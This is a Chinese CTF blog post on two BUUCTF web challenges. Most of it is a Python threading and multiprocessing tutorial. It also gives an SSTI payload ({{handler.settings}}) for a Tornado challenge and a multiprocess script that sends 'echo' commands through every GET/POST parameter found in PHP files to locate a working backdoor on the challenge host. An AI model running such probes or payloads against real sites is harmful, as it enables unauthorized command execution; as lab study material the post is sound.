BUUctf[1]

easy_tornado

tornado:轻量级web框架,拥有异步非阻塞的io处理方式

主要用于高并发场景的处理,与django对比,django注重的是快速开发,orm,后台管理,session处理,而tornado的特点为HTTP服务器,异步编程,websocket

import tornado.web
import tornado.ioloop
import tornado.httpserver


# 一个业务处理类

class IndexHandler(tornado.web.RequestHandler):
    def get(self, *args, **kwargs):
        self.write("hi")


if __name__ == '__main__':
    # 实例化一个应用对象
    app = tornado.web.Application([
        (r"/", IndexHandler)
    ])
    # 绑定监听端口(此时服务器未开始运行)
    # app.listen(8000)
    # 实例化http服务器
    httpServer = tornado.httpserver.HTTPServer(app)
    #启动一个进程
    # httpServer.listen(8000)
    #启动多个进程(2个  ps瘟斗士下好像不能用
    httpServer.bind(8000)
    httpServer.start(2)
    # 服务器开始运行
    tornado.ioloop.IOLoop.current().start()

tornado会把客户端请求到的socket连接交给epoll去管理


当然这题和这些都没关系,就一个ssti

https://xz.aliyun.com/t/2908

error页面输入{{handler.settings}}就行

高明的黑客

python编程练习

threading多线程

threading.active_count() 线程数

threading.enumerate() 枚举所有线程

threading.current_thread() 当前线程


添加线程

added_thread=threading.Thread(target=thread_job) 其中target指向thread_job(这个线程要做的工作)

定义job

def thread_job(): print(“This is an added thread, number is %s” % threading.current_thread())

告诉线程什么时候开始

added_thread.start()

join

多线程是同时开始的任务,如果你想等待某些线程都结束之后再做某件事,那你就会用到join

added_thread.join() 表示这行语句后面的语句要等待added_thread运行完以后才能运行

queue给线程传输数据

因为线程不能使用return传值回来,于是使用队列来传值

import threading
import time
from queue import Queue


def job(l,q):
    for i in range(len(l)):
        l[i]=l[i]**2
    q.put(l)

def multithreading():
    q=Queue()
    threads=[]
    data=[[1,2,3],[2,3,4],[5,5,5],[6,6,1]]
    for i in range(4):
        t=threading.Thread(target=job,args=(data[i],q))
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()
    results=[]
    for _ in range(4):
        results.append(q.get())
    print(results)

if __name__ == "__main__":
    multithreading()

同步和异步针对应用程序来,关注的是程序中间的协作关系;阻塞与非阻塞更关注的是单个进程的执行状态。

python threading的问题

python有GIL,实际上使用多线程只能节省掉I/O操作的时间

🔒lock

import threading


def job1():
    global A,lock
    lock.acquire()
    for i in range(10):
        A += 1
        print("job1", A)
    lock.release()

def job2():
    global A,lock
    lock.acquire()
    for i in range(10):
        A += 10
        print('job2', A)
    lock.release()


if __name__ == "__main__":
    A = 0
    lock=threading.Lock()
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()

multiprocessing多进程

与多线程很相似

import multiprocessing as mp
import threading as td
def job(a,d):
    print('aaa')

t1=td.Thread(target=job,args=(1,2))
p1=mp.Process(target=job,args=(1,2))
import multiprocessing as mp
def job(q):
    res=0
    for i in range(1000):
        res+= i+i**2+i**3
    q.put(res)


if __name__ == "__main__":
    q=mp.Queue()
    p1=mp.Process(target=job,args=(q,))
    p2=mp.Process(target=job,args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1=q.get()
    res2=q.get()
    print(res1+res2)

pool

import multiprocessing as mp


def job(x):
    return(x*x)

def multicore():
    pool=mp.Pool(processes=4)
    res=pool.map(job,range(1000000))
    print(res)
    res=pool.apply_async(job,(2,))
    print(res.get())
    multi_res=[pool.apply_async(job,(i,)) for i in range(10)]
    print([res.get() for res in multi_res])

if __name__ == "__main__":
    multicore()

共享内存

要指定变量的类型

import multiprocessing as mp

value=mp.Value('i',1)
# 只能是一维列表
array=mp.Array('i',[1,2,4])

lock

和多线程类似

import multiprocessing as mp
import time


def job(v, num,l):
    l.acquire()
    for i in range(10):
        time.sleep(0.1)
        v.value += num
        print(v.value)
    l.release()


def multicore():
    l=mp.Lock()
    v = mp.Value('i', 0)
    p1 = mp.Process(target=job, args=(v, 1,l,))
    p2 = mp.Process(target=job, args=(v, 3,l,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


if __name__ == "__main__":
    multicore()

本题脚本

import requests
import os
import re
import multiprocessing as mp


def job(file):
    print("try" + file)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"}
    root = r"C:\Users\23981\Desktop\tmp\buu1\src"
    url = r"http://web15.buuoj.cn/"
    post_list = []
    get_list = []
    with open(root + '\\' + file) as f:
        text = f.read()
        a = re.findall(r"\$_POST\['.*']", text)
        for i in a:
            shit = requests.post(url=url + file, data={i[8:-2]: 'echo "fucking yeah"'}, headers=headers)
            print(shit.content.decode('utf-8'))
            if "fucking yeah" in shit.text:
                print(file, i)
                pool.close()
                exit(0)
        # post_list.append()
        b = re.findall(r"\$_GET\['.*']", text)
        for i in b:
            shit = requests.post(url=url + file, params={i[7:-2]: 'echo "fucking yeah"'},headers=headers)
            print(shit.content.decode('utf-8'))
            if "fucking yeah" in shit.text:
                print(file, i)
                pool.close()
                exit(0)


if __name__ == '__main__':
    root = r"C:\Users\23981\Desktop\tmp\buu1\src"
    url = r"http://web15.buuoj.cn/"
    file_list = []
    for files in os.walk(root):
        file_list = files
    file_list = file_list[2]
    pool = mp.Pool(processes=20)
    res = pool.map(job, file_list)
    pool.join()

脚本要跑很久,而且被WAF ban了????啥情况,明天我再看看

疯狂被waf墙,想不到解决办法,先水一篇博客

发表评论

电子邮件地址不会被公开。 必填项已用*标注